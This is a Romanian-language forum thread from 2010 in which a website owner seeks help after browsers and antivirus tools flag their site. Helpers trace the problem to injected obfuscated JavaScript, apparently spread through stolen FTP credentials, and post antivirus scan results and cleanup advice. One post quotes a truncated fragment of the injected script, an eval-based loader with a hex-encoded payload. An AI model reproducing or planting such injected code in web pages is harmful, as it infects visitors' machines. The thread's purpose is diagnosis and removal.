site infectat

am un site pus pe serverele romtelecom. google chrome il arata mai mereu ca fiind periculos (vezi warning.jpg). cei de la romtelecom zic ca nu e nimic in neregula pe serverele lor si ca totul e ok. firma care se ocupa de mentenanta site-ului zice ca fisierele sunt infectate periodic desi nimeni altcineva nu are contul si parola de ftp. am mai gasit un site care face scanari de site-uri si asa zice ca site-ul are "Exploit: Javascript Obfuscation" (vezi exploit.jpg) .
pe cine sa cred si/sau cum pot scapa de acest "javascript obfuscation"?

site-ul este


multumesc

Edited by JulotM, 26 March 2010 - 21:24.

Firma care se ocupa de site ar trebui sa aiba responsabilitatea datelor. Kaspersky ma anunta si pe mine ca acolo este troian-downloader si acest lucru este generat cel mai des* de cei care au acces ftp la site. Ei au un virus pe calculator ce le infecteaza toate siturile la care au acces ftp.
Pentru tine cel mai usor de depistat a cui este vina este sa te uiti la mai multe situri facute de acea companie si daca mai vezi intr-un singur loc acea eroare atunci tocmai ai gasit vinovatul. Iti dai seama ca din acel moment eu ti-as recomanda alta companie pe partea de situri...

Bafta!
*(poate generalizez aiurea, mai asteapta pareri)

p.s. daca si tu ai acces ftp la acel site atunci si tu poti sa fii de vina. La fel si daca au altii datele de ftp de la acel site (si-atunci nu mai este vina celui care se ocupa de situl tau)

Edited by Ravy, 24 March 2010 - 14:07.

stiu ca e un virus care se manifesta la fel... iti arata ca unele siteuri sunt blocate... l-am avut si eu... nu sunt sigur ca asta e problema si la tine, dupa cum spunea si ravy, mai asteapta pareri....

-spune-le la cei ce se ocupa de site sa se uite in cod si sa vada ce e in neregula !
-daca ai si tu access la site prin ftp , deviruseaza calculatorul si schimba parola de conectare ftp , la fel sa faca si cei de la firma de mentenanta !

Edited by Dobybest, 24 March 2010 - 14:26.

Dobybest, on 24th March 2010, 14:24, said:

la care "cod" te referi?

mie NOD32 nu imi da nici un mesaj de avertizare la accesarea siteului, nici AVG-ul.

Fiecare fisier de pe situl tau are niste coduri. Practic din ce mi-a aparut mie ca avertizare tind sa cred ca sunt infectate fisierele .js (si posibil index. ...) din fiecare folder
Antivurisii tai nu decteaza acest lucru din cauza ca nu sunt updatati sau nu stiu sa depisteze acel cod. Eu tocmai ti-am scris mai sus ca pe mine m-a avertizat kis si nu m-a lasat sa accesez situl.

Bafta!

Edited by Ravy, 24 March 2010 - 14:58.

Ravy, on 24th March 2010, 13:30, said:

Si Avast avertizeaza.

Quote

Tot ce ai fisiere html, php , js sunt infectate. Le trimit la analiza.

Edited by crysty2k5, 24 March 2010 - 22:13.

crysty2k5, on 24th March 2010, 21:23, said:

multumesc, imi spui si mie cind ai un rezultat?

The file 'index.php' has been determined to be 'MALWARE'. Our analysts named the threat JS/Packed.FF. The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

The file '001.php' has been determined to be 'MALWARE'. Our analysts named the threat JS/Packed.FE. The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

Etc Etc

Asta e doar o analiza(a venit mai repede de la Avira). Am trimis la toti producatorii importanti.

Edited by crysty2k5, 25 March 2010 - 16:18.

crysty2k5, on 25th March 2010, 17:16, said:

Multumesc de informatii. Vreo idee despre ce antivir stie sa si curete asa ceva?

Manual
-ori pui un backup mai vechi cu fisierele nevirusate
-ori editezi fiecare fisier virusat (teoretic la sfarsitul fisierului este codul cu pricina)

Bafta!
p.s. pentru editare poti sa folosesti si notepad

Ravy, on 29th March 2010, 14:35, said:

adica codul virusului ar fi ceva de genul asta:

"<div id='x0c01e0f67039f12631a91aa13eb63558b'><script>var jQuery = eval('wtiGn(dGocwu.ueGvGatlu'.replace(/[t\(cuG]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6d\x30\x79\x39\x4e\x63\x28\x6f\x7a\x38\x54\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x73\x48\x68\x4f\x58\x28\x73\x47\x47\x68\x52\x29\x7b\x76\x61\x72\x20\x6b\x45\x38\x6a\x4f\x3d\x30\x3b\x76\x61\x72\x20\x70\x30\x71\x32\x49\x3d\x73\x47\x47\x68\x52\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x6e\x41\x69\x44\x4e\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x6e\x41\x69\x44\x4e\x3c\x70\x30\x71\x32\x49\x29\x7b\x6b\x45\x38\x6a\x4f\x2b\x3d\x72\x74\x35\x5a\x28\x73\x47\x47\x68\x52\x2c\x6e\x41\x69\x44\x4e\x29\x2a\x70\ "

Da, ceva de genul.
In general intre "el" si codul real este un rand liber din cate am vazut in mai multe ocazii. Asa ca-ti va fi usor de identificat. Daca nu te pricepi totusi apeleaza la cineva care se pricepe si neaparat sa-ti faci macar acum backup (chiar daca fisierele sunt infectate deoarece poti sterge din greseala si un "cod bun")

Bafta!

Dupa ce modifici si aduci site-ul la zi, fa backup.

am luat de pe site un fisier php si l-am bagat intr-un site care l-a scanat folosind mai multi antivirusi. raspunsul a fost ceva de genul:
Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
a-squared      4.5.0.8         20100328073120    2010-03-28  4.79   Virus.JS.Packed.AB!IK
AhnLab V3      2010.03.27.00   2010.03.27        2010-03-27  1.07   HTML/Agent
AntiVir        8.2.1.204       7.10.5.242        2010-03-28  0.25   JS/Packed.FE
Antiy          2.0.18          20100326.4086645  2010-03-26  0.12   -
Arcavir        2009            201003281230      2010-03-28  0.02   -
Authentium     5.1.1           201003282249      2010-03-28  1.26   -
AVAST!         4.7.4           100328-1          2010-03-28  0.01   JS:Packed-AB [Trj]
AVG            8.5.720         271.1.1/2776      2010-03-29  0.32   -
BitDefender    7.81008.5554841 7.31001           2010-03-29  5.41   -
ClamAV         0.95.3          10643             2010-03-29  0.01   -
Comodo         3.13.579        4421              2010-03-29  0.88   -
CP Secure      1.3.0.5         2010.03.28        2010-03-28  0.02   -
Dr.Web         5.0.1.12222     2010.03.29        2010-03-29  6.30   -
F-Prot         4.4.4.56        20100328          2010-03-28  1.25   -
F-Secure       7.02.73807      2010.03.29.04     2010-03-29  0.33   -
Fortinet       4.0.14          11.631            2010-03-28  0.21   -
GData          19.10896/19.848 20100329          2010-03-29  5.06   JS:Packed-AP [Trj] [Engine:B]
ViRobot        20100327        2010.03.27        2010-03-27  1.16   -
Ikarus         T3.1.01.80      2010.03.29.75501  2010-03-29  5.45   Virus.JS.Packed.AB
JiangMin       13.0.900        2010.03.29        2010-03-29  10.28  -
Kaspersky      5.5.10          2010.03.28        2010-03-28  0.09   -
KingSoft       2009.2.5.15     2010.3.29.7       2010-03-29  0.62   -
McAfee         5.3.00          5934              2010-03-28  3.71   -
Microsoft      1.5605          2010.03.29        2010-03-29  7.06   -
Norman         6.04.10         6.04.00           2010-03-24  6.01   -
Panda          9.05.01         2010.03.28        2010-03-28  2.31   -
Trend Micro    9.120-1004      6.958.03          2010-03-28  0.03   -
Quick Heal     10.00           2010.03.29        2010-03-29  1.50   JS/Agent.FF
Rising         20.0            22.41.00.01       2010-03-29  0.54   -
Sophos         3.05.4          4.51              2010-03-29  3.85   Troj/ObfJS-O
Sunbelt        3.9.2412.2      6111              2010-03-28  5.21   -
Symantec       1.3.0.24        20100328.003      2010-03-28  0.05   -
nProtect       20100328.01     7870227           2010-03-28  4.84   -
The Hacker     6.5.2.0         v00247            2010-03-28  0.40   -
VBA32          3.12.12.2       20100326.1147     2010-03-26  2.88   -
VirusBuster    4.5.11.10       10.122.18/2005883 2010-03-29  2.31   JS.Agent.FFGL


mi se pare ciudat ca foarte putini antivirusi detecteaza infectia.

Poti sa imi trimiti fisierul cu pricina prin PM intr-o arhiva ?

Nu pe forum !!!!!!

crysty2k5, on 30th March 2010, 16:19, said:

fisierele de pe site au fost curatate, iar cel downloadat de mine l-am sters. daca se mai intimpla o sa ti-l trimit.

multumesc.